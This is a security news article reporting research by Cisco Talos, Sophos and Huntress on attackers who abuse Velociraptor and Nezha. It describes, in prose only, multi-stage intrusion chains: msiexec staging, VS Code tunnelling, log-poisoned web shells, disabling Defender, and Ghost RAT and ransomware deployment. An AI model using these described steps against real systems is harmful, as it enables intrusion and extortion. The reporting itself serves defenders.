Legit Tools Turned Malicious: Velociraptor and Nezha Weaponized

Cybersecurity professionals are witnessing a troubling trend where legitimate software tools are being repurposed for malicious campaigns. Security researchers have identified two open-source platforms, Velociraptor and Nezha, being actively weaponized by threat actors to establish persistence, evade detection, and deploy damaging payloads across enterprise networks.

A ransomware group with suspected ties to China has incorporated Velociraptor into its attack chain. This tool, normally employed for digital forensics and incident response, helps maintain hidden access to compromised systems. The attackers leveraged an outdated Velociraptor version (0.73.4.0) containing a privilege escalation flaw tracked as CVE-2025-6264, which could result in complete endpoint takeover and arbitrary command execution. Their objective involved deploying Warlock, LockBit, and Babuk ransomware strains on both VMware ESXi virtual machines and Windows servers.

According to Cisco Talos, the intrusion followed a specific sequence. The threat actor used the Windows msiexec utility to fetch an installer from a Cloudflare Workers domain, which served as a staging area for various tools. This installer deployed Velociraptor, configured to communicate with a command-and-control server. The attackers then executed an encoded PowerShell command to download Visual Studio Code from the same location, running it with tunneling enabled and installing it as a service. A subsequent msiexec command downloaded additional malware, illustrating a multi-stage intrusion process. Sophos incident responders identified matching indicators of compromise and successfully blocked the ransomware deployment.

In a separate campaign, a suspected China-nexus APT group has been using Nezha, an open-source server monitoring and task management application. This tool allows the group to gather detailed system information and remotely control compromised machines, serving as an alternative to more common remote administration tools.

Huntress researchers documented an intrusion beginning in August 2025 where attackers used a technique called log poisoning to implant a China Chopper web shell on a web server. This provided initial access, which they leveraged to deploy Nezha for executing commands directly on the server. Notably, the attackers then used Nezha to install Ghost RAT malware, marking the first publicly reported case of Nezha facilitating web server compromises.

The researchers located the attacker’s Nezha server instance, discovering an exposed dashboard interface. While administrative credentials are typically required for full control, the interface publicly displayed system health information for all connected agents. Through this exposure, Huntress confirmed that the Nezha client had been installed on over 100 victim machines. The threat actor’s dashboard was configured in Russian, adding another layer to their operational security.

Attackers utilized the Nezha agent to run interactive PowerShell scripts that disabled Windows Defender protections before deploying the Ghost RAT variant. This approach demonstrates how threat actors continuously adapt, incorporating newly available public tools into their arsenals. These legitimate tools offer significant advantages: they’re less likely to trigger security alerts, and if discovered, provide attackers with plausible deniability since the software itself has legitimate purposes.

The dual cases of Velociraptor and Nezha highlight a broader shift in offensive security tactics. As defenders improve at detecting traditional malware, attackers increasingly turn to dual-use tools that blend into normal network traffic. Security teams must now account for these applications in their threat models, recognizing that the very tools used for system administration and monitoring can be turned against them.

(Source: HelpNet Security)